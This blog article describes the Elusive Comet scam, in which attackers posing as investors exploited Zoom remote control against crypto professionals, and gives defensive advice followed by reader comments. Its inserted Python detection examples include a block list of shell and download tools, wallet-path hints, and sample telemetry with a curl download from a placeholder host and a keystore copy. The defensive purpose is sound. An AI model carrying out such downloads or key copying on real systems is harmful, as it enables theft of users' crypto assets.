Protecting Your Crypto Assets From Social Engineering and Remote Access Attacks

Cryptocurrency traders and investors face an evolving threat landscape where sophisticated social engineering campaigns are combining with legitimate collaboration tools to compromise even security-conscious users. Recent incidents involving North Korean threat actors exploiting Zoom’s remote control feature demonstrate that the cryptocurrency industry must fundamentally reassess how it approaches operational security in an era of remote work and virtual meetings.

The Threat Landscape

In April 2025, cybersecurity researchers from the Security Alliance (SEAL) and Trail of Bits documented a campaign tracked as “Elusive Comet” in which North Korean hackers posed as venture capital investors and media producers to target cryptocurrency professionals. The campaign resulted in millions of dollars in losses and employed approximately thirty sock-puppet social media accounts alongside sophisticated corporate impersonation websites.

The attackers created a fictitious entity called Aureon Capital, complete with professional branding and online presence, to establish credibility with potential victims. They initiated contact through standard public relations pitches or direct messages inviting targets to appear on cryptocurrency podcasts. Once a victim expressed interest, the attackers scheduled Zoom calls, often withholding meeting details until the last minute to create urgency and reduce the target’s ability to verify the invitation.

During the calls, victims were prompted to share their screens to present their work. At that point, the attackers requested remote control access through Zoom’s built-in feature. By changing their display name to “Zoom,” the attackers made the permission dialog appear as a routine system notification rather than a request from another meeting participant. A single hasty click granted the attackers full mouse and keyboard access to the victim’s computer.
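A defender-side check for the display-name trick described above, added here as an example and not code from the original post: it screens a list of participant display names (assumed to come from a meeting report or participant export) for names that, after stripping zero-width characters, full-width forms and a constructed subset of look-alike letters, collapse to a name the platform itself would use.

```python
import unicodedata

# Constructed subset of look-alike characters (Cyrillic/Greek letters that render
# like Latin ones); a real deployment would use a full confusables table.
CONFUSABLES = {"\u043e": "o", "\u041e": "O", "\u03bf": "o",
               "\u0396": "Z", "\u043c": "m", "\u039c": "M"}
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}
# Names that should never belong to a human participant in a meeting.
RESERVED = {"zoom", "zoomsupport", "zoomsystem", "system", "systemnotification"}

def normalize_name(name: str) -> str:
    """Collapse the tricks that make a participant look like the platform itself."""
    name = unicodedata.normalize("NFKC", name)          # full-width 'Ｚｏｏｍ' -> 'Zoom'
    name = "".join(CONFUSABLES.get(ch, ch) for ch in name if ch not in ZERO_WIDTH)
    # Keep only letters and digits so 'Z o o m', 'Zoom.' and 'Zoom_' all compare equal.
    return "".join(ch for ch in name if ch.isalnum()).casefold()

def flag_impersonators(participants):
    """Return the raw display names that normalize to a reserved platform name."""
    return [p for p in participants if normalize_name(p) in RESERVED]

if __name__ == "__main__":
    # Constructed participant list: one honest name, three impersonation attempts.
    print(flag_impersonators(["Alice Chen", "Zoom", "Z\u200boom", "Z\u043e\u043em"]))
```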

Core Principles

Defending against these attacks requires a multi-layered approach built on three core principles: verification, segregation, and minimal privilege.

Verification means independently confirming the identity of anyone requesting a meeting or collaboration. This includes verifying email domains, checking LinkedIn profiles for consistency, and cross-referencing claimed affiliations with official company directories. Trail of Bits identified the attack when supposed Bloomberg producers used consumer-grade Zoom accounts rather than Bloomberg’s enterprise tenant—precisely the kind of discrepancy that verification processes can catch.

Segregation involves maintaining separate environments for different activities. Cryptocurrency wallet operations should never occur on the same device used for general communications, meetings, and web browsing. A dedicated, air-gapped machine or hardware wallet should handle all significant transactions.

Minimal privilege means configuring your systems to grant the least access necessary for any given task. Zoom’s remote control feature should be disabled at the account level for users who do not need it, and clipboard sharing should be turned off to prevent attackers from accessing sensitive data.

Tooling and Setup

Implementing robust protection starts with your collaboration platform configuration. Zoom administrators can disable remote control at the account, group, or user level, and can lock the setting to prevent users from re-enabling it. The clipboard sharing option that attackers exploit to access private keys and seed phrases should be removed entirely.

Beyond Zoom settings, cryptocurrency professionals should deploy endpoint detection and response solutions that monitor for unusual process execution during video calls. Hardware security keys for two-factor authentication provide an additional layer of protection against credential theft, even if an attacker gains remote access to a workstation.
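One way to express the "unusual process execution during video calls" rule as detection logic, added here as an example and not the article's or any EDR vendor's code: it walks constructed newline-delimited JSON telemetry (an assumed format with meeting_start, meeting_end and process_start events) and alerts on interactive tools or wallet-path access that occur only while a meeting is active.

```python
import json

# Interactive tools an attacker driving the keyboard reaches for; a trader seldom
# launches these mid-call, so their appearance during a meeting is alert-worthy.
HIGH_RISK_IMAGES = {"Terminal", "bash", "zsh", "sh", "osascript", "curl", "wget",
                    "powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
# Path fragments that suggest a wallet or key store is being touched (constructed list).
SENSITIVE_HINTS = ("keystore", "wallet", "seed", ".electrum", "Ledger Live", "MetaMask")

def in_meeting_alerts(event_lines):
    """Walk JSON-lines telemetry in time order and return (ts, kind, image, cmd)
    alerts for risky process launches between meeting_start and meeting_end."""
    events = [json.loads(l) for l in event_lines.splitlines() if l.strip()]
    events.sort(key=lambda e: e["ts"])          # ISO-8601 UTC strings sort lexically
    in_meeting, alerts = False, []
    for ev in events:
        if ev["type"] == "meeting_start":
            in_meeting = True
        elif ev["type"] == "meeting_end":
            in_meeting = False
        elif ev["type"] == "process_start" and in_meeting:
            image, cmd = ev["image"], ev.get("cmd", "")
            if image in HIGH_RISK_IMAGES:
                alerts.append((ev["ts"], "high_risk_tool", image, cmd))
            elif any(h.lower() in cmd.lower() for h in SENSITIVE_HINTS):
                alerts.append((ev["ts"], "sensitive_path", image, cmd))
    return alerts

# Constructed sample telemetry: during a call a shell and a download appear, then a
# copy that touches a wallet keystore; the Terminal launch after the call is benign.
SAMPLE = """\
{"ts": "2025-04-15T14:00:00Z", "type": "meeting_start", "app": "zoom.us"}
{"ts": "2025-04-15T14:01:10Z", "type": "process_start", "image": "Keynote", "cmd": "Keynote deck.key"}
{"ts": "2025-04-15T14:06:02Z", "type": "process_start", "image": "Terminal", "cmd": "Terminal"}
{"ts": "2025-04-15T14:06:09Z", "type": "process_start", "image": "curl", "cmd": "curl -o /tmp/update.pkg https://example.invalid/update"}
{"ts": "2025-04-15T14:07:30Z", "type": "process_start", "image": "cp", "cmd": "cp ~/Library/Ethereum/keystore/UTC--placeholder /tmp/k"}
{"ts": "2025-04-15T14:12:00Z", "type": "meeting_end", "app": "zoom.us"}
{"ts": "2025-04-15T15:30:00Z", "type": "process_start", "image": "Terminal", "cmd": "Terminal"}
"""

if __name__ == "__main__":
    for alert in in_meeting_alerts(SAMPLE):
        print(*alert)
```

The meeting window can be sourced from the Zoom client's own logs or from the EDR's process-start event for the meeting client; the rule is deliberately time-bounded so that the same Terminal launch outside a call raises nothing.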

For wallet management, hardware wallets like Ledger or Trezor keep private keys isolated from the computer entirely. Even if an attacker gains full remote control, they cannot access keys stored on a hardware wallet without physical possession of the device and its PIN.

Browser extensions that manage cryptocurrency wallets should be installed in a separate browser profile used exclusively for blockchain interactions. This prevents malicious actors from accessing wallet extensions through a general-purpose browser session.

Ongoing Vigilance

The Elusive Comet campaign demonstrates that these threats are not theoretical—they are actively exploiting real cryptocurrency users and causing significant financial losses. The threat actors behind this campaign continue to operate, refining their techniques and targeting new victims.

Security awareness training should cover the specific tactics used in these campaigns: unsolicited meeting invitations, requests for screen sharing, pressure to act quickly, and unexpected prompts for remote access. Team members should feel empowered to decline suspicious requests without fear of missing professional opportunities.

Regular security audits of communication and collaboration tools ensure that new features or configuration changes do not introduce vulnerabilities. The cryptocurrency industry’s high-value targets make it a persistent focus for nation-state actors and organized criminal groups.

Final Takeaway

The convergence of social engineering with legitimate collaboration tools represents a fundamental shift in how cryptocurrency theft occurs. The tools built for productivity and teamwork are being weaponized against the very people who rely on them. Protecting your assets requires treating every digital interaction with the same caution you would apply to physical security—verify identities, segregate sensitive operations, and maintain strict access controls. In an industry where a single compromised click can cost millions, operational security is not optional—it is essential.

Disclaimer: This article is for educational purposes only and does not constitute professional security advice. Consult with cybersecurity experts for comprehensive protection strategies.


10 thoughts on “Protecting Your Crypto Assets From Social Engineering and Remote Access Attacks”

  1. Aureon Capital had a full website and branding for 30 fake accounts. The DPRK ops budget is not trivial; this is state-funded.

  2. phish_blacklist

    The Aureon Capital sock puppet setup with 30 fake accounts is next level. These aren't script kiddies; this is nation-state-level social engineering.

    1. Thirty accounts and a fake VC website with professional branding. The budget behind this operation is insane.

  3. Zoom remote access being the actual exploit vector is the part nobody talks about enough. You literally hand control to the attacker in a legitimate app.

    1. The scary part is how normal the Zoom call seems. VC pitch, screen share, remote control for a demo. You would never suspect state actors.

      1. opsec_nerd_: The remote control feature should be disabled by default on Zoom. Instead it's one click away. Insane attack surface.
